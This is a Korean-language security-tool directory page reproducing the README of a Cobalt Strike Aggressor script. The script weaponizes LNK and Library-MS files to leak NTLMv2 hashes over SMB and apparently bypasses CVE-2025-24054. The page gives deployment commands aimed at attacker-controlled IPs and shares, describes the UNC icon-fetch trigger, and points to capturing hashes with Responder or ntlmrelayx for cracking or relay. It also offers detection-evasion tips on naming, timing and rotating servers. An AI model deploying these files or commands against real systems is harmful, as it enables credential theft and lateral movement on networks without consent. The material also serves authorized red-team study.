Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-50154-Aggressor-Script — 승인된 레드 팀 운영을 위해 SMB NTLMv2 해시 노출을 트리거하는 LNK 및 Library-MS 파일을 무기화하는 Cobalt Strike Aggressor 스크립트로, CVE-2025-24054 우회를 포함합니다. | Kitploit
도구/GitHubGitHub/ash1996x/cve-2025-50154-aggressor-script
Password CrackingPhishing ToolsExploit FrameworksPayload GenerationLateral MovementInformation GatheringPost-ExploitationCTFPenetration Testing

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Command and Control
Learning & Education
Red Teaming
GitHubash1996x/cve-2025-50154-aggressor-script

CVE-2025-50154-Aggressor-Script

승인된 레드 팀 운영을 위해 SMB NTLMv2 해시 노출을 트리거하는 LNK 및 Library-MS 파일을 무기화하는 Cobalt Strike Aggressor 스크립트로, CVE-2025-24054 우회를 포함합니다.

저장소 보기
1240년 전아직 검토되지 않음

LNK Weaponizer - Cobalt Strike Aggressor 스크립트

SMB NTLMv2-SSP 해시 공개를 위해 악성 LNK 파일 및 Library-MS 파일을 무기화하고 실행하는 포괄적인 Cobalt Strike Aggressor 스크립트입니다. CVE-2025-24054 우회 기술을 포함합니다.

⚠️ 면책 조항

이 도구는 교육 및 연구 목적으로만 제공됩니다. 작성자는 이 코드의 오용에 대해 어떠한 책임도 지지 않습니다. 소유하거나 명시적 테스트 허가를 받은 시스템에서만 사용하십시오.

NTLM 해시 캡처

이 스크립트는 열릴 때 운영자의 호스트로 SMB 인증을 트리거하는 무기화된 .lnk 및 .library-ms 파일을 생성합니다.
유출된 NTLMv2 해시는 Cobalt Strike에 표시되지 않으며, 공격자 시스템에서 실행 중인 Responder, Impacket의 ntlmrelayx.py 또는 Inveigh와 같은 외부 도구로 캡처해야 합니다.
수집된 해시는 Hashcat으로 크래킹하거나 추가 수평 이동을 위해 릴레이할 수 있습니다.

🎯 기능

  • LNK 파일 무기화: NTLM 해시 캡처를 위한 악성 바로가기 파일 생성
  • Library-MS 파일 생성: CVE-2025-24054 우회 기술 구현
  • 우클릭 메뉴 통합: Cobalt Strike 비콘 컨텍스트 메뉴를 통한 간편 접근
  • 명령줄 인터페이스: 자동화 및 스크립팅을 위한 직접 명령
  • 대화형 다이얼로그: 사용자 친화적인 매개변수 입력
  • 빠른 배포: 신속한 배포를 위한 사전 구성 설정
  • 전역 구성: 기본 설정의 쉬운 사용자 정의

📁 프로젝트 구조

root@kitploit:~
cobalt-strike-aggressor/
├── lnk_weaponizer.cna           # 메인 Aggressor 스크립트 (v2.0)
├── standalone_lnk_weaponizer.ps1 # 독립 실행형 PowerShell 버전
├── README.md                    # 이 문서
├── INSTALL.md                   # 설치 및 설정 가이드
└── examples/
    ├── usage_scenarios.md       # 실용적인 사용 예제
    └── sample_targets.csv       # 샘플 배치 작업 파일

🚀 설치

  1. lnk_weaponizer.cna를 Cobalt Strike Aggressor 스크립트 디렉터리에 복사합니다.
  2. Cobalt Strike에서 스크립트를 로드합니다:
    • Cobalt Strike → Script Manager로 이동
    • Load를 클릭하고 lnk_weaponizer.cna 선택
  3. 스크립트가 자동으로 초기화되고 사용 가능한 명령을 표시합니다.

📖 사용법

우클릭 메뉴 옵션

Cobalt Strike에서 비콘을 우클릭하여 다음에 접근합니다:

  1. LNK 파일 생성: 사용자 정의 LNK 생성을 위한 대화형 다이얼로그
  2. Library-MS 파일 생성: Library-MS 생성을 위한 대화형 다이얼로그 (CVE-2025-24054 우회)
  3. 빠른 LNK (기본 설정): 사전 설정 값으로 빠른 LNK 배포
  4. 빠른 Library-MS (기본 설정): 사전 설정 값으로 빠른 Library-MS 배포

명령줄 명령

LNK 파일 명령

root@kitploit:~
# Create LNK file with custom parameters
lnk_create <path> <ip> <share> <file>

# Example
lnk_create C:\Temp 192.168.1.10 share payload.exe

Library-MS 파일 명령

root@kitploit:~
# Create Library-MS file with custom parameters
library_create <path> <ip> <share>

# Example
library_create C:\Temp 10.10.14.22 share

빠른 명령

root@kitploit:~
# Use default settings
lnk_quick
library_quick

# Show help
lnk_help

🔧 구성

기본 설정

스크립트는 다음 구성 가능한 기본값을 사용합니다:

  • IP: 192.168.1.10
  • 공유 이름: share
  • 경로: C:\Temp

기본값 사용자 정의

lnk_weaponizer.cna에서 전역 변수를 편집합니다:

root@kitploit:~
global('$default_ip $default_share $default_path');
$default_ip = "192.168.1.10";
$default_share = "share";
$default_path = "C:\\Temp";

🎯 작동 방식

LNK 파일 기술

  1. PowerShell 스크립트 생성: 악성 LNK 파일을 생성하는 PowerShell 스크립트를 생성합니다
  2. LNK 파일 생성: Windows Shell COM 개체를 사용하여 원격 SMB 위치를 가리키는 바로가기를 생성합니다
  3. 아이콘 트리거: 원격 바이너리에서 PE 아이콘을 가져오도록 Explorer를 강제하여 NTLM 인증을 트리거합니다
  4. 해시 캡처: 사용자가 파일과 상호작용할 때 NTLMv2-SSP 해시가 캡처됩니다

Library-MS 기술 (CVE-2025-24054 우회)

  1. XML 생성: UNC 경로 참조가 포함된 Library-MS XML 파일을 생성합니다
  2. 파일 생성: 대상 디렉터리에 .library-ms 파일을 생성합니다
  3. 사용자 상호작용: 사용자가 Library-MS 파일을 더블클릭하면 Windows가 UNC 경로에 액세스를 시도합니다
  4. 인증 트리거: SMB 인증이 트리거되어 NTLM 해시를 캡처합니다

기술 세부 사항

두 기술 모두 다음을 수행하는 파일을 생성합니다:

  • 원격 SMB 위치를 가리킴
  • 액세스 시 인증 트리거
  • 일반적인 보안 제어 우회
  • 안정적인 해시 캡처 제공

📊 출력 형식

스크립트는 상세한 로깅을 제공합니다:

root@kitploit:~
[+] Creating LNK file on TARGET-COMPUTER
[+] Target UNC: \\192.168.1.10\share\payload.exe
[+] Local Path: C:\Temp
[+] LNK weaponization completed
[!] Wait for user to click the LNK file to capture NTLM hash

🛡️ 보안 고려 사항

탐지 회피

  • 정당해 보이는 공유 이름과 경로 사용
  • 탐지를 피하기 위해 배포 타이밍 고려
  • 보안 도구 알림 모니터링
  • Library-MS 기술은 추가 회피 기능 제공

운영 보안

  • 해시 수집 전용 SMB 서버 사용
  • 적절한 로깅 및 모니터링 구현
  • 조직의 레드팀 절차 준수
  • 모든 테스트 활동 문서화

법적 준수

  • 테스트 전 적절한 권한 확인
  • 모든 테스트 활동 문서화
  • 범위와 경계 준수

🔍 문제 해결

일반적인 문제

  1. 비콘을 찾을 수 없음

    • 대상 컴퓨터에 활성 비콘이 있는지 확인
    • 배치 작업에서 컴퓨터 이름 철자 확인
  2. 권한 거부

    • 대상 경로에 쓰기 권한이 있는지 확인
    • 대상 시스템의 UAC 설정 확인
  3. PowerShell 실행 정책

    • 스크립트는 bpowershell()을 사용하여 제한 사항을 처리합니다
    • 대상에 PowerShell이 사용 가능한지 확인

디버그 모드

스크립트를 수정하여 상세 출력을 활성화합니다:

root@kitploit:~
# Add debug logging
blog($bid, "[DEBUG] Executing command: " . $command);

📝 예제

시나리오 1: LNK 파일 배포

root@kitploit:~
# Create LNK file on specific target
lnk_create C:\Users\Public\Desktop 10.0.0.5 public malware.exe

시나리오 2: Library-MS 우회

root@kitploit:~
# Create Library-MS file for CVE-2025-24054 bypass
library_create C:\Users\Public\Desktop 192.168.1.100 share

시나리오 3: 빠른 공격

root@kitploit:~
# Use default settings for rapid deployment
lnk_quick
library_quick

🔬 고급 기술

CVE-2025-24054 우회

Library-MS 기술은 다음과 같은 방법으로 CVE-2025-24054 우회를 구현합니다:

  • 기존 LNK 파일 대신 Library-MS 파일 형식 사용
  • 인증 트리거를 위해 Windows 라이브러리 시스템 활용
  • 추가 회피 기능 제공

회피 전략

  • 파일 이름: 현실적인 이름 및 확장자 사용
  • 경로 선택: 일반적인 사용자 디렉터리에 배포
  • 타이밍: 정상 업무 시간 동안 실행
  • 로테이션: SMB 서버 IP 및 공유 이름 변경

🤝 기여

  1. 저장소 포크
  2. 기능 브랜치 생성
  3. 변경 사항 적용
  4. 철저한 테스트
  5. 풀 리퀘스트 제출

📄 라이선스

이 프로젝트는 교육 목적으로 있는 그대로 제공됩니다. 해당 법률 및 규정에 따라 책임감 있게 사용하십시오.

🙏 감사의 말

  • Aggressor 프레임워크를 제공한 Cobalt Strike 팀
  • 테스트 및 피드백을 제공한 레드팀 커뮤니티
  • LNK 기반 공격을 개척한 보안 연구자들
  • CVE-2025-24054 연구에 기여한 분들

기억하세요: 모든 시스템에서 테스트하기 전에 항상 적절한 권한을 얻으십시오.

도구 다운로드